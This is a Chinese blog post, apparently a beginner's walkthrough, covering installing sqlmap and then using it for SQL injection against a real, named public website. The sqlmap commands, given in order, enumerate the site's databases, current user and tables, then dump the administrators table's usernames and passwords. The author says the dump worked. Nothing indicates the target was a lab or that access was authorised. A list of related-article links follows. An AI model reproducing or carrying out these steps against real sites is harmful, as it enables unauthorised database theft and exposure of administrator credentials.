windows下一次简单的拖库练习
技术小白的一次艰难尝试,由于虚拟机出现问题不能使用,所以就在Windows环境下进行了尝试。过程十分的艰难,但是最终得到了想要的结果就很开心。这篇文章会从一开始sqlmap的安装开始讲起,力争可以实现傻瓜式操作。(话说我当初资料找的不是很好,走了很多弯路)
sqlmap的安装
下载地址:http://sqlmap.org/
网站上有两种压缩格式的文件,随便哪一种都可以。将压缩包解压到python2.7所在的目录下,像这个样子。(需要事先下载安装python2.7,高版本的不可以,目前来说2.7是最合适的了)
接下来就是正式安装的部分了。
第一步:在桌面新建快捷方式下一步
完成
第二步:设置SQLMAP的属性,将起始位置设置为sqlmap的路径,如下图
第三步:打开SQLMAP,输入sqlmap.py -h,如下图所示,就成功的安装了。 简单的拖库
在进行拖库之前,我们需要找到一个合适的有SQL注入漏洞的网站,或者自己建一个有SQL注入的网站。我是问同学要了一个网站,网址是 http://www.bible-history.com/subcat.php?id=2
第一步:检测这个网站能不能注入
sqlmap.py -u "http://www.bible-history.com/subcat.php?id=2"
windows环境下这一步检测要花费挺长时间的,中间会有几次问道Y/N,选择Y,然后等待检测结束。我这一步的操作可能是存在某种问题,注入类型只找到了两个。
第二步:查看所有的数据库
sqlmap.py -u "http://www.bible-history.com/subcat.php?id=2" --dbs
第三步:在得到了数据库中的信息之后,查看当前使用的数据库
sqlmap.py -u "http//www.bible-history.com/subcat.php?id=2" --current-db
当前使用的数据库名字是 bible_history
第四步:查看登陆web数据库的用户名
sqlmap.py -u "http://www.bible-history.com/subcat.php?id=2" --current-user
用户名是rusty@localhost
第五步:查看bible_history这个数据库中所有的表
sqlmap.py -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history --tables
第六步:选择一个表查看表中的字段,我选择了administrators这个表。
sqlmap.py -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators --columns
做到这一步,发现自己拿到了字段,那就把信息拿出来吧。
最后一步:拖库
sqlmap.py -u "http//www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump
成功的取出来了信息。
ps:拖库(当然也被很多程序员称为脱裤),本来是数据库领域的术语,指从数据库中导出数据。到了黑客攻击泛滥的今天,它被用来指网站遭到入侵后,黑客窃取其数据库。在安全领域我是一只小小白,经常解决不了问题,这是我第一次完整的做过的实验,就记录一下吧。
windows下一次简单的拖库练习相关推荐
- 厉害了黑科技,动态安全下的防拖库原来可以这么简单!
[51CTO.com原创稿件]9月28日,中国高校数据泄密违法处罚第一案诞生--国家网络与信息安全信息通报中心通报:淮南职业技术学院系统存在高危漏洞,系统存储的4353余名学生身份信息已经造成泄露.据 ...
- 即使被拖库,也可以保证密码不泄露
转自:http://blog.coderzh.com/2016/01/10/a-password-security-design-example/ 在前一篇文章<设计安全的账号系统的正确姿势&g ...
- 将Linux代码移植到Windows的简单方法
将Linux代码移植到Windows的简单方法 一.前言 Linux拥有丰富各种源代码资源,但是大部分代码在Windows平台情况是无法正常编译的.Windows平台根本无法直接利用这些源代码资源.如 ...
- 拖库还是撞库?网易邮箱罗生门
从乌云言之凿凿的报告和网友的如潮控诉来看,网易邮箱信息泄露,似乎已经被坐实. 然而,对于数据泄露的方式,网易和乌云存在着一定的分歧.那么,乌云在说什么,网易又在说什么呢?我们可以简单梳理一下. 1.1 ...
- 撞库是什么意思?与洗库和拖库有什么关系?
撞库黑客专用语又叫做扫存,是一种非常常见的黑客攻击方式,通过收集互联网已泄露的拖库信息,特别是注册用户的用户名和密码信息,生成对应的字典表.然后通过恶意程序和字典表批量尝试登录其他网站,得到可用的真实 ...
- android/iphone/windows/linux/微信声波通讯库
声波通讯让传统的各种linux设备,单片机设备等等能编程的设备与智能手机之间有了数据传输的能力,这在智能家居.医疗设备.工业应用等各个行业有了大力应用的机会. 声波通讯让电脑与手机连通:电脑一般都有音 ...
- wince6 qt mysql_用Qt Creator开发Windows的简单计算机的程序
用Qt Creator开发Windows的简单计算机的程序 因为这次的目的也是为了确认透过Qt来开发WinCE的程序 所以请确认自己的环境是否有设定完成,这部分的进程请看http://www.dotb ...
- 由拖库攻击谈口令字段的加密策略
原文地址:由拖库攻击谈口令字段的加密策略 我不得不惨痛地写在前面的是,这是一个安全崩盘的时代.过去一年,已经证实的遭遇入侵.并导致关键数据被窃或者被泄露的公司,包括索尼.世嘉这样的大型游戏设备厂商:包 ...
- 十分钟用Windows服务器简单搭建DHCP中继代理!!
十分钟用Windows服务器简单搭建DHCP中继代理!! 一.什么是中继代理? 大家都知道DHCP分配地址都需要用到IP广播,但是广播是不能在两个网段之间进行 ...
- 迅雷官方回应“被拖库”致密码泄露:恶意造谣
昨日晚间,有微博网友爆料称,迅雷遭遇拖库事件,用户密码.下载记录全部泄露.所谓拖库,本来是数据库领域的术语,指从数据库中导出数据,而在黑客攻击泛滥的今天,它被用来指网站遭到入侵后,黑客窃取其数据库. ...
最新文章
- 硬盘的转速是什么意思,有什么功能?
- java.lang.NoClassDefFoundError: org/aspectj/weaver/reflect/ReflectionWorld$ReflectionWorldException
- mysql gui 有哪些_推荐五款较好的MySQLGUI工具
- 安装wordcloud_COVID19数据分析实战:WordCloud 词云分析
- 在c语言程序中 对文件进行操作首先要,《C语言程序设计》试题八及答案
- html导出excel 内存不足,web导出excel那些坑
- JPA学习笔记---JPA理解---第一个JPA程序
- 【学习总结】数学-基本计数方法
- PHP内存溢出:Allowed memory size of 536870912 bytes exhausted (tried to allocate 20480 bytes)
- 数组的最长递减子序列java_47.创新工场: 求一个数组的最长递减子序列 | 学步园...
- osg加载osgb数据_PCM点云数据处理软件功能使用第十七弹
- java判断日文_如何在Java字符串中检测日文文本?
- 【gp数据库】十条实用数据库SQL优化建议
- springboot使用logback
- 3. 站在使用层面,Bean Validation这些标准接口你需要烂熟于胸
- 面包店利用拼团模式面包免费送-月销售30万 !
- Scikit-plot画图
- 手把手教你用 jQuery 制作无缝轮播
- Latex表示随机变量相互独立,不独立
- python ogr_python gdal教程之:用ogr读写矢量数据